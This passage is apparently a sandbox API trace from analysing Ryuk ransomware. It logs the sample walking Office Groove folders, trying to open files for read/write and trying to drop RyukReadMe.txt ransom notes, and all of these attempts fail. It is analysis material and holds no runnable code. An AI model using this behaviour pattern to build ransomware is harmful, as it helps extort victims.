office\\office14\\groove\\sounds\\people\\mmhmm.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.814] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.814] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.814] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.814] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.814] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\SNEEZE.WAV", dwFileAttributes=0x80) returned 0 [0136.814] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\SNEEZE.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\sneeze.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.814] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.814] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.814] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.815] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.815] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\THROAT.WAV", dwFileAttributes=0x80) returned 0 [0136.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\THROAT.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\throat.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.815] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.815] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.815] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.815] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.815] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\Whistling.wav", dwFileAttributes=0x80) returned 0 [0136.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\Whistling.wav" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\whistling.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.816] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.816] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.816] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0136.816] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0136.817] SetLastError (dwErrCode=0x0) [0136.817] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.819] GetLastError () returned 0x5 [0136.819] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0136.820] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.820] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.820] SetLastError (dwErrCode=0x0) [0136.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.820] GetLastError () returned 0x5 [0136.820] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0136.820] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.820] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0136.822] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.822] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.822] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.822] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\ALARM.WAV", dwFileAttributes=0x80) returned 0 [0136.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\ALARM.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\alarm.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.822] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.822] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.822] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.822] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.822] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\BUZZ.WAV", dwFileAttributes=0x80) returned 0 [0136.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\BUZZ.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\buzz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.823] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.823] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.823] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.823] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.823] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\LASER.WAV", dwFileAttributes=0x80) returned 0 [0136.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\LASER.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\laser.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.823] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.823] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.823] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.823] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.824] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\RADAR.WAV", dwFileAttributes=0x80) returned 0 [0136.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\RADAR.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\radar.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.824] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.824] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.824] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.824] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.824] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\TOOT.WAV", dwFileAttributes=0x80) returned 0 [0136.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\TOOT.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\toot.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.824] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.824] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.825] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.825] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.825] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\VIBE.WAV", dwFileAttributes=0x80) returned 0 [0136.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\VIBE.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\vibe.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.826] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.826] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.826] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.826] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.826] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\WARN.WAV", dwFileAttributes=0x80) returned 0 [0136.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\WARN.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\warn.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.827] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.827] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.827] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0136.827] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0136.827] SetLastError (dwErrCode=0x0) [0136.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.830] GetLastError () returned 0x5 [0136.830] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0136.830] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.830] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.830] SetLastError (dwErrCode=0x0) [0136.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.830] GetLastError () returned 0x5 [0136.830] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0136.830] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.830] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0136.832] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.832] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.832] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.832] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\CAN.WAV", dwFileAttributes=0x80) returned 0 [0136.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\CAN.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\can.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.832] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.832] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.832] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.832] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.833] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\COUPLER.WAV", dwFileAttributes=0x80) returned 0 [0136.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\COUPLER.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\coupler.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.833] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.833] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.833] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.833] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.833] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\HORN.WAV", dwFileAttributes=0x80) returned 0 [0136.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\HORN.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\horn.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.833] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.833] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.834] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.834] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.834] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SHOT.WAV", dwFileAttributes=0x80) returned 0 [0136.834] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SHOT.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\shot.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.834] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.835] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.835] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.835] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.835] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SHOVEL.WAV", dwFileAttributes=0x80) returned 0 [0136.835] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SHOVEL.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\shovel.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.835] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.835] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.835] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.835] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.835] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SPLASH.WAV", dwFileAttributes=0x80) returned 0 [0136.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SPLASH.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\splash.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.836] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.836] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.836] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.836] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.836] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\WHOOSH.WAV", dwFileAttributes=0x80) returned 0 [0136.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\WHOOSH.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\whoosh.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.837] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.837] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.837] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0136.837] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0136.838] SetLastError (dwErrCode=0x0) [0136.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.841] GetLastError () returned 0x5 [0136.841] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0136.841] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.841] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0136.841] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0136.841] SetLastError (dwErrCode=0x0) [0136.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.841] GetLastError () returned 0x5 [0136.841] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.841] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.841] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.841] SetLastError (dwErrCode=0x0) [0136.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.841] GetLastError () returned 0x5 [0136.841] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.841] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.841] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0136.844] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.845] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.845] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.845] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\CalendarToolIconImages.jpg", dwFileAttributes=0x80) returned 0 [0136.845] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\CalendarToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\calendartooliconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.846] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.846] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.846] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.846] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.846] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\CalendarToolIconImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\CalendarToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\calendartooliconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.846] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.846] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.846] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.846] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.847] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\ChessIconImages.bmp", dwFileAttributes=0x80) returned 0 [0136.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\ChessIconImages.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\chessiconimages.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.847] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.847] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.847] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.847] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.847] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\ChessIconImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\ChessIconImagesMask.bmp" (normalized: "c:\\program 